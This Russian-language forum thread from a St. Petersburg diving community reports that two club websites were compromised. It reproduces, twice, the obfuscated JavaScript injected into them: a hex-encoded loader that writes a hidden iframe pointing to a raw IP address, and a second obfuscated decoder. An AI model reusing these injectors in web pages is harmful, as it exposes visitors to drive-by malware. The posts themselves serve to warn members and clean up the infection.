|
Дайвинг в Санкт–Петербурге Объединенный форум дайв-клубов Санкт-Петербурга и окрестностей
|
Предыдущая тема :: Следующая тема |
Автор |
Сообщение |
Михаил Милько
Зарегистрирован: 27.01.2006 Сообщения: 145 Откуда: "Сафари-Тур", Санкт-Петербург
|
Добавлено: Пт Авг 08, 2008 15:01 Заголовок сообщения: На сайте "Нереиса" - черви. |
|
|
Техадмину рекомендую оперативно убрать все гиперссылки на сайт "Нереиса" с этого форума (и с иконки и из профайла Александра Чернобельского) - с их первой страницы всем желающим подгружаются черви, кликеры и прочая плесень, причём не самая безобидная.
Далеко не у всех пользователей надежные антивирусы стоят.
Последний раз редактировалось: Михаил Милько (Пт Авг 08, 2008 15:17), всего редактировалось 1 раз |
|
Вернуться к началу |
|
|
Tech Admin Технический Администратор
Зарегистрирован: 06.10.2005 Сообщения: 1185 Откуда: Санкт-Петербург
|
Добавлено: Пт Авг 08, 2008 15:06 Заголовок сообщения: |
|
|
Ссылку в шапке форума заглушил временно
По остальным вопросам лучше а АЧ обращаться |
|
Вернуться к началу |
|
|
kifbest
Зарегистрирован: 03.08.2008 Сообщения: 32
|
Добавлено: Пт Авг 08, 2008 15:07 Заголовок сообщения: |
|
|
ровно таже ситуация с 2B3, при заходе туда срабатывает антивирус. |
|
Вернуться к началу |
|
|
Михаил Милько
Зарегистрирован: 27.01.2006 Сообщения: 145 Откуда: "Сафари-Тур", Санкт-Петербург
|
Добавлено: Пт Авг 08, 2008 15:08 Заголовок сообщения: |
|
|
Tech Admin писал(а): | Ссылку в шапке форума заглушил временно
По остальным вопросам лучше а АЧ обращаться |
Ему в личку я уже сообщил. |
|
Вернуться к началу |
|
|
Александр Першанин
Зарегистрирован: 06.07.2005 Сообщения: 9061
|
Добавлено: Пт Авг 08, 2008 15:40 Заголовок сообщения: |
|
|
2В3 (не диагностируется):
Код: | <script>
<!--
var d=document,kol=561;
function O10H489AEC0398D2C(H489AEC0399524){ function H489AEC0399D1E() {var H489AEC039A518=16;return H489AEC039A518;} return( parseInt(H489AEC0399524,H489AEC0399D1E()));}function H489AEC039AD0E(H489AEC039B51A){ function H489AEC039CCF1() {var H489AEC039D4EE=2;return H489AEC039D4EE;} var H489AEC039BCFF='';for(H489AEC039C4FE=0; H489AEC039C4FE<H489AEC039B51A.length; H489AEC039C4FE+=H489AEC039CCF1()){ H489AEC039BCFF += ( String.fromCharCode (O10H489AEC0398D2C(H489AEC039B51A.substr(H489AEC039C4FE, H489AEC039CCF1()))));}return H489AEC039BCFF;} document.write(H489AEC039AD0E ('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D 4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F 2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38353035 30292B2735365C272077696474683D333135206865696768743D323730207374796C653D5C27 646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script> |
НЕРЕЙС (инфицирован VBS.PackFor):
Код: | <script language=JavaScript>
function zazaban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,3,53,29,43,44,32,22,21,5,0,0,0,0,0,0,30,17,50,54,18,14,33,31,24,35,34,37,9,38,20,16,8,41,57,61,47,4,55,42,15,45,49,0,0, 0,0,62,0,59,0,10,1,6,19,48,46,25,58,23,36,56,40,39,27,2,60,51,11,52,13,26,7,28,12);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(176^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}zazaban('zMY2qx3V81RgqX3IHfzZb4moG@3uUkYFpaiC@pSVGDroO@yCNfzCvePlHk3CkIvZvePl1fyByk3IeoSgit3CyovZL4PCifv28aYIz_iC7tyu3kYI')</script> |
|
|
Вернуться к началу |
|
|
kifbest
Зарегистрирован: 03.08.2008 Сообщения: 32
|
Добавлено: Пт Авг 08, 2008 15:47 Заголовок сообщения: |
|
|
Александр Першанин писал(а): | 2В3 (не диагностируется):
Код: | <script>
<!--
var d=document,kol=561;
function O10H489AEC0398D2C(H489AEC0399524){ function H489AEC0399D1E() {var H489AEC039A518=16;return H489AEC039A518;} return( parseInt(H489AEC0399524,H489AEC0399D1E()));}function H489AEC039AD0E(H489AEC039B51A){ function H489AEC039CCF1() {var H489AEC039D4EE=2;return H489AEC039D4EE;} var H489AEC039BCFF='';for(H489AEC039C4FE=0; H489AEC039C4FE<H489AEC039B51A.length; H489AEC039C4FE+=H489AEC039CCF1()){ H489AEC039BCFF += ( String.fromCharCode (O10H489AEC0398D2C(H489AEC039B51A.substr(H489AEC039C4FE, H489AEC039CCF1()))));}return H489AEC039BCFF;} document.write(H489AEC039AD0E ('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D 4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F 2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38353035 30292B2735365C272077696474683D333135206865696768743D323730207374796C653D5C27 646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script> |
НЕРЕЙС (инфицирован VBS.PackFor):
Код: | <script language=JavaScript>
function zazaban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,3,53,29,43,44,32,22,21,5,0,0,0,0,0,0,30,17,50,54,18,14,33,31,24,35,34,37,9,38,20,16,8,41,57,61,47,4,55,42,15,45,49,0,0, 0,0,62,0,59,0,10,1,6,19,48,46,25,58,23,36,56,40,39,27,2,60,51,11,52,13,26,7,28,12);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(176^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}zazaban('zMY2qx3V81RgqX3IHfzZb4moG@3uUkYFpaiC@pSVGDroO@yCNfzCvePlHk3CkIvZvePl1fyByk3IeoSgit3CyovZL4PCifv28aYIz_iC7tyu3kYI')</script> |
|
про 2B3 касперский говорит Trojan-Clicker.JS.Agent.h |
|
Вернуться к началу |
|
|
nereis
Зарегистрирован: 23.06.2005 Сообщения: 15308 Откуда: Санкт-Петербург
|
Добавлено: Пт Авг 08, 2008 16:48 Заголовок сообщения: |
|
|
Михаил Милько писал(а): | Tech Admin писал(а): | Ссылку в шапке форума заглушил временно
По остальным вопросам лучше а АЧ обращаться |
Ему в личку я уже сообщил. |
Ссылку из профиля убрал. Об остальном сообщу специально обученному человеку.
Спасибо. _________________ Александр Чернобельский
CMAS/КПДР RUS/F00/I3/06/000027
RUAC RUS/I3/22/000002
"Клуб спортивного туризма "БЕЛОЕ МОРЕ" |
|
Вернуться к началу |
|
|
Никита
Зарегистрирован: 17.09.2007 Сообщения: 60 Откуда: Санкт-Петербург
|
Добавлено: Пт Сен 12, 2008 13:35 Заголовок сообщения: |
|
|
как всю ветку так и весь раздел - нужно грохнуть..))
черви заселились..
- настало время ВЫСЕЛЯТЬ......
ЭЭЭ.. ПРЕВЕД ?? _________________ Живы будем - не помрем.. |
|
Вернуться к началу |
|
|
Max S.Yakovlev
Зарегистрирован: 01.05.2006 Сообщения: 617 Откуда: On-Line Путешественник!
|
Добавлено: Пт Сен 12, 2008 15:58 Заголовок сообщения: |
|
|
Блин, а хостинг-провайдер у них один и тот же? Может хакнули хостера, как Валуехост в прошлом году
Тогда на всех сайтах у них коды прописывались... _________________ UW-Tec.RU - официальный представитель FantaSea Line, ТПА "ГНОМ", и компании DivePoint Maldives (Rannalhi, Hudhuran Fushi, Meedhupparu, Vadoo, Guraidhoo, Amaya Kuda Rah, You&Me, Fuvahmulah) |
|
Вернуться к началу |
|
|
nereis-www
Зарегистрирован: 17.09.2008 Сообщения: 2
|
Добавлено: Ср Сен 17, 2008 12:51 Заголовок сообщения: Черви вычищены |
|
|
Действительно, это поломали хостинг провайдера.
(в наш html код после вредных js-функций были вписаны комментарии, типа это код от хостинг провайдера)
Сейчас весь "чужой" код найден и удален. Все работает как надо.
Можно спокойно заходить к нам на сайт.
Спасибо.
P.S.
Еще мы понемногу совершенствуем сайт.
Если будут какие замечания по работе - пишите пож-та в личку. |
|
Вернуться к началу |
|
|
Tech Admin Технический Администратор
Зарегистрирован: 06.10.2005 Сообщения: 1185 Откуда: Санкт-Петербург
|
Добавлено: Ср Сен 17, 2008 13:48 Заголовок сообщения: |
|
|
Ссылка в шапке восстановлена. |
|
Вернуться к началу |
|
|
Дмитрич
Зарегистрирован: 17.03.2008 Сообщения: 382 Откуда: Санкт-Петербург
|
Добавлено: Ср Сен 17, 2008 14:06 Заголовок сообщения: Re: Черви вычищены |
|
|
nereis-www писал(а): | P.S.
Еще мы понемногу совершенствуем сайт.
Если будут какие замечания по работе - пишите пож-та в личку. |
Какой то глюк у вас на сайте.
Нажимаю на фото в разделе "условия проживания" и выкидывает сразу на главную. _________________ Алексей, CMAS*, AOWD |
|
Вернуться к началу |
|
|
nereis-www
Зарегистрирован: 17.09.2008 Сообщения: 2
|
Добавлено: Ср Сен 17, 2008 15:15 Заголовок сообщения: Re: Черви вычищены |
|
|
Tech Admin писал(а): | Ссылка в шапке восстановлена. |
Спасибо. Жизнь продолжается!
Дмитрич писал(а): | nereis-www писал(а): | P.S.
Еще мы понемногу совершенствуем сайт.
Если будут какие замечания по работе - пишите пож-та в личку. |
Какой то глюк у вас на сайте.
Нажимаю на фото в разделе "условия проживания" и выкидывает сразу на главную. |
Да, пока что есть такое дело. Почти со всеми всплывающими фотографиями.
Побочный эфект удаления червей - были удалены js-функции.
Сейчас мы страница за страницей проверяем и восстанавливаем.
За два-три дня поправим... Спасибо! |
|
Вернуться к началу |
|
|
|
|
Вы не можете начинать темы Вы не можете отвечать на сообщения Вы не можете редактировать свои сообщения Вы не можете удалять свои сообщения Вы не можете голосовать в опросах
|
|